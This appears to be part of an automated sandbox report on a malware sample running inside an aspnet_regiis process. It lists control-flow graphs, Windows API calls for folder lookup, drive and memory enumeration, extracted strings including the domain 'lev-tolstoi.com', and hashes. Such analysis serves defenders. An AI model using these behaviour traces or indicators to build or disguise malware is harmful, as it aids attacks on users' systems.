                                                                                                                                                                                                                                                                  control_flow_graph 854 72c41227-72c4123f 855 72c41241-72c41244 854->855 856 72c41246-72c4127e 855->856 857 72c41280-72c412ae call 72c31870 855->857 856->855 860 72c412b0-72c412b3 857->860 861 72c412b5-72c412fb 860->861 862 72c412fd-72c41327 call 72c31870 860->862 861->860 865 72c41329-72c41364 call 72c44850 862->865 866 72c4132b-72c4132f 862->866 874 72c41366 865->874 875 72c41368-72c413a9 call 72c37f50 call 72c3a8d0 865->875 868 72c41d26 866->868 869 72c42715 868->869 872 72c42717-72c42733 call 72c31f30 869->872 880 72c3f450-72c42744 872->880 881 72c3f457-72c3f487 call 72c31f40 872->881 874->875 886 72c413ab-72c413ae 875->886 888 72c3f489-72c3f48c 881->888 889 72c413b0-72c413f8 886->889 890 72c413fa-72c4141e call 72c31870 886->890 891 72c3f48e-72c3f4ca 888->891 892 72c3f4cc-72c3f51a call 72c31e30 888->892 889->886 897 72c41486-72c414b6 call 72c44850 890->897 898 72c41420-72c41459 call 72c44850 890->898 891->888 899 72c3f51e-72c3f522 892->899 900 72c3f51c-72c3f545 892->900 906 72c414b8 897->906 907 72c414ba-72c4155f call 72c37f50 call 72c3a8d0 RtlExpandEnvironmentStrings 897->907 909 72c4145d-72c41481 call 72c37f50 call 72c3a8d0 898->909 910 72c4145b 898->910 899->872 908 72c3f549-72c3f54c 900->908 906->907 923 72c41562-72c41565 907->923 913 72c3f54e-72c3f5ab 908->913 914 72c3f5ad-72c3f5fe call 72c31970 908->914 909->897 910->909 913->908 914->869 922 72c3f604 914->922 922->869 924 72c415ff-72c41615 923->924 925 72c4156b-72c415fa 923->925 926 72c41617-72c41628 call 72c37f60 924->926 927 72c4162d-72c41646 924->927 925->923 926->868 929 72c41648 927->929 930 72c4164a-72c416ac call 72c37f50 927->930 929->930 936 72c416ae-72c416d6 call 72c37f60 * 2 930->936 937 72c416db-72c41704 call 72c37f60 930->937 960 72c41d24 936->960 944 72c41706-72c41709 937->944 947 72c4173f-72c4175a call 72c31870 944->947 948 72c4170b-72c4173d 944->948 954 72c417b6-72c417d7 947->954 955 72c4175c-72c41788 call 72c44850 947->955 948->944 957 72c417da-72c417dd 954->957 963 72c4178c-72c417b4 call 72c37f50 call 72c3a8d0 955->963 964 72c4178a 955->964 961 72c417df-72c41816 957->961 962 72c41818-72c4185e call 72c31b80 957->962 960->868 961->957 969 72c41860-72c41863 962->969 963->954 964->963 971 72c41865-72c418b6 969->971 972 72c418b8-72c418e5 call 72c31a80 969->972 971->969 976 72c418e7 972->976 977 72c418ec-72c41930 call 72c31f30 972->977 978 72c41bf1-72c41c75 call 72c38b60 call 72c457c0 976->978 982 72c41934-72c4194d call 72c37f50 977->982 983 72c41932 977->983 988 72c41c7a-72c41c89 call 72c39780 978->988 990 72c4196f-72c41975 982->990 991 72c4194f-72c41956 982->991 983->982 997 72c41cc7-72c41cfa call 72c37f60 * 2 988->997 998 72c41c8b-72c41c9a 988->998 992 72c41977-72c41979 990->992 994 72c41958-72c41964 call 72c44980 991->994 995 72c41984-72c419c4 call 72c31f40 992->995 996 72c4197b-72c4197f 992->996 1009 72c41966-72c4196d 994->1009 1010 72c419c6-72c419c9 995->1010 996->978 1029 72c41d04-72c41d0e 997->1029 1030 72c41cfc-72c41cff call 72c37f60 997->1030 1001 72c41cb5-72c41cc5 call 72c37f60 998->1001 1002 72c41c9c 998->1002 1001->997 1006 72c41c9e-72c41caf call 72c44b10 1002->1006 1019 72c41cb1 1006->1019 1020 72c41cb3 1006->1020 1009->990 1015 72c41a0e-72c41a55 call 72c31870 1010->1015 1016 72c419cb-72c41a0c 1010->1016 1025 72c41a57-72c41a5a 1015->1025 1016->1010 1019->1006 1020->1001 1027 72c41a5c-72c41a77 1025->1027 1028 72c41a79-72c41ac8 call 72c31870 1025->1028 1027->1025 1038 72c41aca-72c41acd 1028->1038 1033 72c41d10-72c41d13 call 72c37f60 1029->1033 1034 72c41d18-72c41d1f call 72c38c40 1029->1034 1030->1029 1033->1034 1034->960 1039 72c41af6-72c41b48 call 72c31b80 1038->1039 1040 72c41acf-72c41af4 1038->1040 1043 72c41b4a-72c41b4d 1039->1043 1040->1038 1044 72c41b7c-72c41bec call 72c31b80 call 72c449a0 1043->1044 1045 72c41b4f-72c41b7a 1043->1045 1044->992 1045->1043
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                                  • API String ID: 0-4163809010
                                                                                                                                                                                                                                                                  • Opcode ID: a1a867c6a02453380212e8cbe4681866eb857501bd7be1d102ae7ce6f306a721
                                                                                                                                                                                                                                                                  • Instruction ID: d676815b95bc35da4b8a40234bc9029f247e8fcf5659a5ab9d5dd2d6e611977c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1a867c6a02453380212e8cbe4681866eb857501bd7be1d102ae7ce6f306a721
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81527E7260C7808BD3259B3DC49439FBFE1ABAA324F195A2ED4D9C7381DA748945CB43
                                                                                                                                                                                                                                                                  Function 72C539B9 Relevance: 14.8, APIs: 3, Strings: 5, Instructions: 821COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1108 72c539b9-72c539ce 1109 72c53a37-72c53a51 1108->1109 1110 72c53a06-72c53a14 1108->1110 1111 72c53990-72c5399c 1108->1111 1112 72c539e0-72c539e8 1108->1112 1113 72c53a20 1108->1113 1114 72c53a22-72c53a30 1108->1114 1115 72c539ef-72c539ff 1108->1115 1116 72c5374a-72c5375f 1108->1116 1109->1109 1109->1110 1109->1111 1109->1112 1109->1113 1109->1114 1109->1115 1109->1116 1126 72c53a58-72c53a5f 1109->1126 1110->1113 1111->1108 1112->1109 1112->1110 1112->1111 1112->1112 1112->1113 1112->1114 1112->1115 1112->1116 1114->1109 1114->1112 1114->1116 1115->1109 1115->1110 1115->1112 1115->1113 1115->1114 1115->1116 1117 72c53785-72c537ad 1116->1117 1118 72c537b4-72c537bc 1116->1118 1119 72c537c4-72c537cc 1116->1119 1120 72c537e0-72c537ef 1116->1120 1121 72c53770-72c5377e 1116->1121 1122 72c537f2-72c537f9 1116->1122 1123 72c5392c-72c53940 1116->1123 1124 72c53919-72c53925 1116->1124 1125 72c5396a-72c53979 1116->1125 1117->1118 1117->1119 1117->1120 1117->1122 1118->1119 1119->1120 1120->1122 1121->1117 1121->1118 1121->1119 1121->1120 1121->1122 1121->1123 1121->1124 1121->1125 1122->1121 1137 72c53800-72c53834 1122->1137 1138 72c538c0-72c538c5 1122->1138 1139 72c538d0 1122->1139 1140 72c53840-72c53842 1122->1140 1141 72c5384e-72c5385b 1122->1141 1123->1125 1123->1126 1127 72c53c85-72c53cbc call 72c37f50 RtlExpandEnvironmentStrings 1123->1127 1128 72c53a77-72c53a8a 1123->1128 1129 72c53980 1123->1129 1130 72c53b50-72c53bd2 1123->1130 1131 72c53cc3 1123->1131 1132 72c53ce2-72c53d2f call 72c37f50 1123->1132 1133 72c53a68-72c53a72 1123->1133 1134 72c53cd8-72c53ce1 1123->1134 1135 72c53ccb-72c53cd5 call 72c37f60 1123->1135 1142 72c53950-72c53963 1123->1142 1124->1118 1124->1119 1124->1120 1124->1122 1124->1123 1124->1125 1125->1126 1125->1127 1125->1128 1125->1129 1125->1130 1125->1131 1125->1132 1125->1133 1125->1134 1125->1135 1126->1133 1127->1131 1127->1132 1127->1134 1127->1135 1167 72c53e0c-72c53eba call 72c37f50 1127->1167 1168 72c53dfe-72c53e03 1127->1168 1169 72c53f79 1127->1169 1170 72c53f69-72c53f71 1127->1170 1171 72c53f9a-72c54035 1127->1171 1156 72c53406-72c53412 1128->1156 1129->1111 1144 72c53be0-72c53c0c 1130->1144 1131->1135 1172 72c53d30-72c53d83 1132->1172 1133->1156 1135->1134 1137->1140 1138->1139 1139->1124 1140->1141 1143 72c53860-72c5387a 1141->1143 1142->1125 1142->1126 1142->1127 1142->1128 1142->1129 1142->1130 1142->1131 1142->1132 1142->1133 1142->1134 1142->1135 1143->1143 1150 72c5387c-72c53883 1143->1150 1144->1144 1151 72c53c0e-72c53c4f RtlExpandEnvironmentStrings 1144->1151 1150->1121 1157 72c53889-72c53898 1150->1157 1158 72c53c50-72c53c73 1151->1158 1161 72c538a0-72c538a7 1157->1161 1158->1158 1162 72c53c75-72c53c7e 1158->1162 1165 72c538d2-72c538d8 1161->1165 1166 72c538a9-72c538ac 1161->1166 1162->1127 1162->1131 1162->1132 1162->1134 1162->1135 1162->1167 1162->1168 1162->1169 1162->1170 1162->1171 1165->1121 1175 72c538de-72c53912 call 72c6e110 1165->1175 1166->1161 1174 72c538ae 1166->1174 1197 72c53ec0-72c53ee5 1167->1197 1168->1167 1181 72c53f7f-72c53f8b call 72c37f60 1169->1181 1170->1169 1177 72c54040-72c540ce 1171->1177 1172->1172 1176 72c53d85-72c53d8e 1172->1176 1174->1121 1175->1117 1175->1118 1175->1119 1175->1120 1175->1122 1175->1123 1175->1124 1175->1125 1182 72c53db1-72c53dc5 1176->1182 1183 72c53d90-72c53d96 1176->1183 1177->1177 1178 72c540d4-72c540dd 1177->1178 1184 72c540e0 call 72c51d00 1178->1184 1200 72c53f94 1181->1200 1189 72c53dc7-72c53dca 1182->1189 1190 72c53de1-72c53dea call 72c714b0 1182->1190 1188 72c53da0-72c53daf 1183->1188 1192 72c540e5-72c540ea 1184->1192 1188->1182 1188->1188 1195 72c53dd0-72c53ddf 1189->1195 1196 72c53def-72c53df7 1190->1196 1198 72c540f3-72c5410f 1192->1198 1195->1190 1195->1195 1196->1167 1196->1168 1196->1169 1196->1170 1196->1171 1196->1181 1196->1198 1197->1197 1199 72c53ee7-72c53ef0 1197->1199 1201 72c54110-72c5415b 1198->1201 1202 72c53f11-72c53f1f 1199->1202 1203 72c53ef2-72c53efa 1199->1203 1200->1171 1201->1201 1204 72c5415d-72c541ce 1201->1204 1206 72c53f41-72c53f62 GetLogicalDrives call 72c714b0 1202->1206 1207 72c53f21-72c53f24 1202->1207 1205 72c53f00-72c53f0f 1203->1205 1208 72c541d0-72c5427b 1204->1208 1205->1202 1205->1205 1206->1134 1206->1135 1206->1169 1206->1170 1206->1181 1206->1198 1206->1200 1214 72c542a7 1206->1214 1215 72c542ad-72c542b9 call 72c37f60 1206->1215 1209 72c53f30-72c53f3f 1207->1209 1208->1208 1211 72c54281-72c5429e call 72c51b60 1208->1211 1209->1206 1209->1209 1211->1214 1214->1215
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: +A#C=]=_$=]=_$_^]\$eN$rp
                                                                                                                                                                                                                                                                  • API String ID: 0-2225558837
                                                                                                                                                                                                                                                                  • Opcode ID: fc355ca2facdb06157fa6777e6885cbe4b28eef7dfee084b9aa9e7df5b028f47
                                                                                                                                                                                                                                                                  • Instruction ID: af59bf2c3d44ca65e641ce57449572066d9164f8196740b8f977b860ceeb27f5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc355ca2facdb06157fa6777e6885cbe4b28eef7dfee084b9aa9e7df5b028f47
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E4249B2A04201CFD714CF6AC8917AABBB2FF99310F2986ACD4459F395D734D946CB90
                                                                                                                                                                                                                                                                  Function 72C38600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1219 72c38600-72c38611 call 72c6d9a0 1222 72c38617-72c3861e call 72c662a0 1219->1222 1223 72c38a48-72c38a4a ExitProcess 1219->1223 1226 72c38a31-72c38a38 1222->1226 1227 72c38624-72c3864a GetCurrentProcessId GetCurrentThreadId 1222->1227 1230 72c38a43 call 72c6e080 1226->1230 1231 72c38a3a-72c38a40 call 72c37f60 1226->1231 1228 72c38650-72c3887f SHGetSpecialFolderPathW 1227->1228 1229 72c3864c-72c3864e 1227->1229 1232 72c38880-72c388ce 1228->1232 1229->1228 1230->1223 1231->1230 1232->1232 1235 72c388d0-72c3891d call 72c6c540 1232->1235 1239 72c38920-72c38943 1235->1239 1240 72c38945-72c38962 1239->1240 1241 72c38964-72c3897c GetForegroundWindow 1239->1241 1240->1239 1242 72c38982-72c38a0b 1241->1242 1243 72c38a0d-72c38a25 call 72c39d00 1241->1243 1242->1243 1243->1226 1246 72c38a27 call 72c3cb90 1243->1246 1248 72c38a2c call 72c3b7b0 1246->1248 1248->1226
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 72C38624
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 72C3862E
                                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 72C387FA
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 72C38974
                                                                                                                                                                                                                                                                    • Part of subcall function 72C3B7B0: FreeLibrary.KERNEL32(72C38A31), ref: 72C3B7B6
                                                                                                                                                                                                                                                                    • Part of subcall function 72C3B7B0: FreeLibrary.KERNEL32 ref: 72C3B7D7
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 72C38A4A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                  • String ID: b]u)$}$}
                                                                                                                                                                                                                                                                  • API String ID: 3676751680-2900034282
                                                                                                                                                                                                                                                                  • Opcode ID: 9a0cf0c86e2803da41fad72ecfd2f232b470566eeed4aa13e2b64e70f2a34c86
                                                                                                                                                                                                                                                                  • Instruction ID: 9950729585a0452a1964da42f151d43aa1119b42ce448ee689646f50f34822cd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a0cf0c86e2803da41fad72ecfd2f232b470566eeed4aa13e2b64e70f2a34c86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C1F873A187144BC708DF6DC84135AF7D6ABD4710F1ACA2DA899E7355EA74DC048BC2
                                                                                                                                                                                                                                                                  Function 72C3CE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 341COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1250 72c3ce45-72c3ce78 call 72c63fd0 call 72c39780 CoUninitialize 1255 72c3ce80-72c3cee4 1250->1255 1255->1255 1256 72c3cee6-72c3cef7 1255->1256 1257 72c3cf00-72c3cf20 1256->1257 1257->1257 1258 72c3cf22-72c3cf64 1257->1258 1259 72c3cf70-72c3cf92 1258->1259 1259->1259 1260 72c3cf94-72c3cf9c 1259->1260 1261 72c3cfbb-72c3cfc3 1260->1261 1262 72c3cf9e-72c3cfa2 1260->1262 1264 72c3cfc5-72c3cfc6 1261->1264 1265 72c3cfdb-72c3cfe6 1261->1265 1263 72c3cfb0-72c3cfb9 1262->1263 1263->1261 1263->1263 1266 72c3cfd0-72c3cfd9 1264->1266 1267 72c3d08a 1265->1267 1268 72c3cfec-72c3cfed 1265->1268 1266->1265 1266->1266 1270 72c3d08d-72c3d095 1267->1270 1269 72c3cff0-72c3cff9 1268->1269 1269->1269 1271 72c3cffb 1269->1271 1272 72c3d097-72c3d09b 1270->1272 1273 72c3d0ad 1270->1273 1271->1270 1275 72c3d0a0-72c3d0a9 1272->1275 1274 72c3d0b0-72c3d0bb 1273->1274 1276 72c3d0cb-72c3d0d7 1274->1276 1277 72c3d0bd-72c3d0bf 1274->1277 1275->1275 1278 72c3d0ab 1275->1278 1280 72c3d0f1-72c3d1b1 1276->1280 1281 72c3d0d9-72c3d0db 1276->1281 1279 72c3d0c0-72c3d0c9 1277->1279 1278->1274 1279->1276 1279->1279 1283 72c3d1c0-72c3d1d2 1280->1283 1282 72c3d0e0-72c3d0ed 1281->1282 1282->1282 1284 72c3d0ef 1282->1284 1283->1283 1285 72c3d1d4-72c3d1f4 1283->1285 1284->1280 1286 72c3d200-72c3d252 1285->1286 1286->1286 1287 72c3d254-72c3d26b call 72c3b7e0 1286->1287 1289 72c3d270-72c3d28a 1287->1289
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                                                                                                                  • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                                                  • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                                                  • Opcode ID: 8d626705dcfdc6932566f1cd300ba6fa2d07796faf8b8e4b24d87cd7f69ea0c1
                                                                                                                                                                                                                                                                  • Instruction ID: c261f4e6c77983af1cc9d53e52cc38c97c5e884753c9c8a8937805abf8bbffd7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d626705dcfdc6932566f1cd300ba6fa2d07796faf8b8e4b24d87cd7f69ea0c1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A103B52047818FD716CF2AC4D0756BBE2FFA6304B18899CC8D24F75AD736A446CB91
                                                                                                                                                                                                                                                                  Function 72C5D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1323 72c5d34a-72c5d362 1324 72c5d370-72c5d382 1323->1324 1324->1324 1325 72c5d384-72c5d389 1324->1325 1326 72c5d39b-72c5d3a7 1325->1326 1327 72c5d38b-72c5d38f 1325->1327 1328 72c5d3c1-72c5d40f call 72c6fe00 GetPhysicallyInstalledSystemMemory 1326->1328 1329 72c5d3a9-72c5d3ab 1326->1329 1330 72c5d390-72c5d399 1327->1330 1335 72c5d410-72c5d44d 1328->1335 1331 72c5d3b0-72c5d3bd 1329->1331 1330->1326 1330->1330 1331->1331 1333 72c5d3bf 1331->1333 1333->1328 1335->1335 1336 72c5d44f-72c5d498 call 72c4e960 1335->1336 1339 72c5d4a0-72c5d551 1336->1339 1339->1339 1340 72c5d557-72c5d55c 1339->1340 1341 72c5d57d-72c5d583 1340->1341 1342 72c5d55e-72c5d568 1340->1342 1343 72c5d586-72c5d58e 1341->1343 1344 72c5d570-72c5d579 1342->1344 1345 72c5d590-72c5d591 1343->1345 1346 72c5d5ab-72c5d5b3 1343->1346 1344->1344 1347 72c5d57b 1344->1347 1348 72c5d5a0-72c5d5a9 1345->1348 1349 72c5d5b5-72c5d5b6 1346->1349 1350 72c5d5cb-72c5d611 1346->1350 1347->1343 1348->1346 1348->1348 1351 72c5d5c0-72c5d5c9 1349->1351 1352 72c5d620-72c5d653 1350->1352 1351->1350 1351->1351 1352->1352 1353 72c5d655-72c5d65a 1352->1353 1354 72c5d66d 1353->1354 1355 72c5d65c-72c5d65d 1353->1355 1357 72c5d670-72c5d67a 1354->1357 1356 72c5d660-72c5d669 1355->1356 1356->1356 1358 72c5d66b 1356->1358 1359 72c5d67c-72c5d67f 1357->1359 1360 72c5d68b-72c5d73c 1357->1360 1358->1357 1361 72c5d680-72c5d689 1359->1361 1361->1360 1361->1361
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C5D3EE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                                  • String ID: ><+
                                                                                                                                                                                                                                                                  • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                                                  • Opcode ID: f36516b8c752d9f96217e6134381c60ab0554eec521bd469f67543d3d1265131
                                                                                                                                                                                                                                                                  • Instruction ID: 8bf420ed8ae52bd493437fb6e55a2fa0dbfb9438a7c713b001d08e9133d69f35
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f36516b8c752d9f96217e6134381c60ab0554eec521bd469f67543d3d1265131
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88C1C0756047818FD715CF2AC490762FBF2AF9A314B28899DC4EB8B752C735E846CB50
                                                                                                                                                                                                                                                                  Function 72C70D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: @Ukx$
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                                  • Opcode ID: 12f8496ffa148b3f09076524ad90a999b37e5d37b93516ee31a7795007306739
                                                                                                                                                                                                                                                                  • Instruction ID: 7b404ae39f886bfa66500402a4b2d1de45831173c52331bbd05ee2e7c8e1e1e6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f8496ffa148b3f09076524ad90a999b37e5d37b93516ee31a7795007306739
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B15332B087504BD318CE29CCE26ABB7A3EBE5314F198A3CD9975B385DA759C058781
                                                                                                                                                                                                                                                                  Function 72C6E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(72C7148A,035BF838,00000018,?,?,00000018,?,?,?), ref: 72C6E13E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
